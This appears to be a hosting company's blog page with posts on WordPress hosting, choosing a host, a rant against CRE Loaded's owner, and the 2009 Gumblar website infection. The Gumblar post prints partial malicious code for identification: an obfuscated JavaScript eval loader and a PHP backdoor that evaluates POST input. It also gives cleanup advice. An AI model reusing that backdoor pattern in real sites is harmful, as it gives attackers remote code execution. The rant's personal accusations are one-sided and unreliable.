Hosting

WordPress Hosting

January 29, 2010 in Hosting, WordPress by SupremeCenterHosting  |  No Comments

WordPress is undoubtedly the most popular, feature rich open source blog publishing application used on millions of websites. It is useful as a content management system and much more with thousands of plugins that extend what WordPress initially can do.

Creating a web site using WordPress is easy when hosting with Supreme Center Hosting. We provide free, professional installation of the latest version of Word Press with any of our hosting plans. Additionally, you can install WordPress yourself via our hosting control panel using Fantastico De Luxe, or the recently added Installatron.

In addition to free installation of WordPress, we also offer website programming services for WordPress. Hosting customers are entitled to a 50% discount off our website programming fees.

The Gumblar .cn Exploit – Worse Than The Swine Flu?

May 15, 2009 in Exploits, Hosting by SupremeCenterHosting  |  No Comments

One Supreme Center Hosting customer had an unrelenting experience with this exploit for over a month. Almost as soon as it was removed it would come back. The gumblar .cn exploit is said to include 1350 scripting exploits and 12 trojans. The gumblar .cn domain is currently blacklisted by Google. Google reports that it has 24 scripting exploit(s), 6 trojan(s). Here is some information we obtained on gumblar .cn:

Domain: gumblar. cn
IP: 94.229.65.172
Reverse Lookup: no.rdns-yet.ukservers.com
Registrant: TiankaiCui cuitiankai@googlemail.com

An IP address lookup found it was associated with:

Alexander A Solovyov
LIMT Group Ltd.
Karpinskogo 97a
Moscow
111423
Russian Federation

The ARIN info on the IP address “belongs to” UK Dedicated Servers Limited. We contacted UK Dedicated Servers abuse department via email and received this response from David Howes:

“Thanks for your concern, we have been made aware of this issue already and removed this server from our network. We are now in the process of contacting the relevant authorities to provide them with as much information as possible.”

“Having spent the last hour or so researching this compromise/exploit it does seem to have been around for a little while, and I am rather surprised that given the number of newsgroup/forum/blog articles etc regarding it you are the first to have contacted us about it.

I only found out about the issue a couple of hours ago, when it was pointed out to me by an acquaintance. I decided to look through our abuse inbox to see if there was any reference to it and yours was the only email we have on the subject!!”

Not sure if you have been infected? Hop on over to Unmask Parasites and scan your website.

If you are fighting this exploit, here are some things you need to know.

Infected websites contain JavaScript code that may look like this [partial code displayed]:

(function(jil){var xR5p=’%';eval(unescape((

Every infected website has it’s own version of the script, with each version having common code which can easily identify the malicious code as the gumblar .cn exploit.

The javascript code starts with “(function(.” The function has no name and some characters are replaced with their numeric value. The “%” character is replaced with some arbitrary character. Near the end of the script there is a “.replace(” function. If the function accepts variables, at the very end you might find a regular expression such as /”/g or /~/g that will decrypt the “%” character.

When the script is executed, another script is loaded and executed. This code is usually injected right before the body tag but can be found in other parts of the page. Unlike the recent iframe exploits, the gumblar exploit is injected into every web page including .js (JavaScript) files [usually at the bottom]. Perhaps coincidental, its seems most of the infected sites use PHP.

PHP files contain code that may look like this [partial code displayed]:

< ?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))
eval($_POST['tmp_lkojfghx3']);if(!defined(’TMP_XHGFJOKL’))
define(’TMP_XHGFJOKL’,base64_decode

It is safe to say that the exploit is not server-wide. We checked the server our client is on and it was the only site that was infected. The exploit may be caused by compromised FTP credentials.

A good place to start is with your own computer. Scan it for malware/spyware/virus’s. You might try downloading and scanning your system with Malwarebytes. Update the software and run it in safemode (press F8 on startup) and remove all malware from your system, if present.

After you have completely scanned your system, change FTP passwords. It also would not hurt to change ALL passwords [cPanel, MySQL databases]. Then remove the malicious code from all infected files (.html, .php, .js). If you have a backup of your website, use it. We ended up having to delete all files from our clients account and restored a full backup – so far, so good.

Malicious code has been know to use older versions of Adobe Acrobat Reader. The adobe_updater can be a legitimate Adobe Auto Updater service that starts every time you launch Adobe products. Since the virus needs to open Acrobat Reader, it also triggers the updater. There are known security issues in the latest (9.1) version of Adobe Acrobat Reader, and Adobe suggests that you disable the JavaScript support altogether.

It has also been suggested that Adobe Flash Player may also be affected. When updating Adobe Acrobat Reader, you should update Adobe Flash Player as well.

Exploit Infection Prevention

How does one prevent the spread of a nasty virus? First, thoroughly wash your hands with soap & water [yes, you do need to use soap!]. After you hands are free of all nasal mucus, update your anti-virus and malware/spyware applications.

It is said that resistance to, and recovery from viral infections, will depend on the interactions that occur between virus and host. To prevent or limit infection, the host needs barriers that are inherent to the organism. These barriers represent the first line of defense which function to prevent or limit infection. Its no secret that Internet Explorer lacks the necessary barriers. Stop using Internet Explorer. We suggest that you use Firefox with the NoScript add-on. As Benjamin Franklin said, “An ounce of prevention is worth a pound of cure.”

Update your scripts to the latest version[s]. Keeping them updated is your responsibility as a hosting customer.

What to look for in a hosting company

October 26, 2008 in Hosting by SupremeCenterHosting  |  No Comments

Type “hosting” at Google and you will find that there are currently 439,000,000 results for the search term … you should not have any trouble finding the perfect host for you and your website. However, its always best to start by asking friends or family who may already have a website who they recommend. A good review from someone you trust is far more valuable than reviews from people you don’t know. Visiting the countless hosting review sites can be a little daunting and the fact is, you will find that many of them “recommend” the same 5-10 hosting companies. The reason being is hosting companies pay for the reviews or for featured listings.

Before you decide on a host make sure that the host trustworthy and reliable, it is always worthwhile noting how long the company has been in business. Unfortunately anyone can set up a web hosting company, unless you ask the right questions you will not be able to judge the competence of any hosting company.

If you are new to websites and web hosting in general, it would be wise to host your sites with am established web hosting company. They are capable of dealing with less technically adept customers and are willing to go the extra mile. Due to their size, an established host is normally more flexible when it comes to upgrading your hosting plan, providing a payment plan of your choice and they have more servers available than the smaller hosting companies. It may also be wise to pick a host that may offer some support for the application that you may plan on using. Most hosts will not provide support for third party applications such as WordPress, Joomla or osCommerce, so you may not have them to rely on should something go wrong – Supreme Center Hosting is one of few hosting companies that provides limited support for many open source applications. Some hosts will even provide free professional installations of popular applications. Another suggestion would be to choose a host that may offer additional products and services such as SSL certificates, website programming or even managed services – you never know when you might need additional services and your host will normally give discounts to their customers for additional products or services they might need.

When looking for a host, first decide how much disk space and bandwidth you might need. Although this is not normally a deal breaker as you can always upgrade your plan should the need for more space or transfer arise. However, you do want to make sure that the host you plan to use and the plan you choose has the correct specs for the application you plan to use – you don’t want to choose a unix host when you plan on using an application that is coded in ASP.

If you are currently hosting a website and are planning on moving to a new hosting provider, it might be wise to look for a host that can help you with the transition. Many hosting companies, such as Supreme Center Hosting, provide free transfer services for customers who are using cPanel. This makes the transition that much easier and you will have less to do in order to get your site up and going with your new host.

CRE Loaded just got worse

October 20, 2008 in CRE Loaded by SupremeCenterHosting  |  No Comments

I could all out flame CRE Loaded and Salvatore Iozzia here today but what good would it do? I doubt very highly that it would make any real difference to the current CRE Loaded open source model. Fact is, I had plenty to say in the “Sal’s Message to the Community” thread at the CRE Loaded forums regarding past and current issues, and it seems Sal is oblivious to the opinion’s that were offered. He somehow managed to muster up enough backbone to to create the post, while flip flopping on the entire issue. The entire post looks like it was pulled out of a page from the past with many of the more well-known forum members taking a whack at Sal’s pride.

By know it is probably obvious that I am not new to CRE Loaded. I started using it back in 2003-2004 when it was still in [bug filled] version v6.15. I even did work for Sal [installations, contribution additions] while I was upstarting my hosting business. That was until he screwed me out of $500 for worked I performed and about the time that David Graham, of the osCommerce University, suggested that Sal start selling CRE Loaded. I remember having a chat conversation with David regarding sale of the open source application but was never aware that he suggested it [or I am getting too old to remember]. I gently poked David in the aforementioned thread by saying “If your suggesting that you persuaded Sal to sell CRE then, Shame on you! It was you sir who created the Ugly Monster!” His response clearly showed that he was as pissed as I… “Yeah, well, I never intended anyone to mislead the public about the GPL and its implications either. Which is why EOS itself is free and will remain so.” What? is it possible that Salvatore Iozzia could mislead the end user? Sure it is. I read posts by Sal, and his now world famous moderator Gerald, regarding the GPL license. It was clear to me that what they were trying to do was mislead the lesser informed end user that they really were not permitted to do anything with CRE… but pay for it.

Now this brings up a new question… what exactly was the end user paying for? That ultimately is a very good question. At this point, I have no idea. David Graham recently blogged about this in his post “CRE Launches New Open Source Model” and stated that “My original concept when proposing CRE Loaded commercialization was to charge a standard fee per copy distributed with a 30 to 90 day support window, following which support could be obtained on a contract basis.” Okay, so the end user was paying for support? Hmmm… having had conversations with owners of other companies that were using, or had clients using CRE Loaded, this was clearly not the case. Apparently, support was one thing that was missing from the $200 price tag for Pro and $300 price tag for B2B.

Okay, so what do I think about all of this? What was missing from the launch of the new model and CRE 6.2 was Value-Added Services. By definition, it would be the term for non-core services… services that add value to a standard service offering. This could be any number of things. Using CRE as an example, the value-added services could be Support, plugins, templates, etc. As an active supporter of Open Source applications since 2003, we offer web site hosting and hosting services for a variety of open source applications and provide value-added services such as free professional installation and free support for a variety of issues that a customer my experience while using the application. We also provide web site programming services for these applications at a nominal [and below industry standard] fee.

So my question is… why is it that Sal thought it a good idea to sell CRE when he could have offered additional value-added services at reasonable rates? These services could have been any or all of those mentioned above. Support/Maintenance contracts could have been offered to those who either do not have the experience necessary to modify code or just did not want to. Plugins, that could not be found for free at osCommerce.com, could have been developed in-house and sold in the CRE store. Same goes for custom templates. Any service or a combination of services could have been offered to the CRE end user, whom I might add would have been more than happy to pay for. However, the “Evil Greedy Overlord” could not help himself. He not only put unreasonable price tags on the open source application, he charged 2 arms and a leg for additional services that really should have been part of the “support” the end user was supposed to get.

So what have we learned from all this? Never, and I mean never pay for open source applications. The whole idea behind open source is that the source code should be free. This does not mean that everything should be free [contributions, support, templates, hosting, etc], but that the application itself should be free. Granted, the GPL license states that you can sell the code. That is correct, sir. Let’s use Linux as an example. Linus Torvalds wrote and released Linux as open source and it can be found everywhere for $0. Why is it that Red Hat is selling it then? Well, they are not selling the Linux source code. What they are selling is value-added services in the forum of features that can not be found in the original source, support and improved & robust versions.

Finally, we have also learned that you can’t trust anyone who calls themselves the “Evil Overlord.”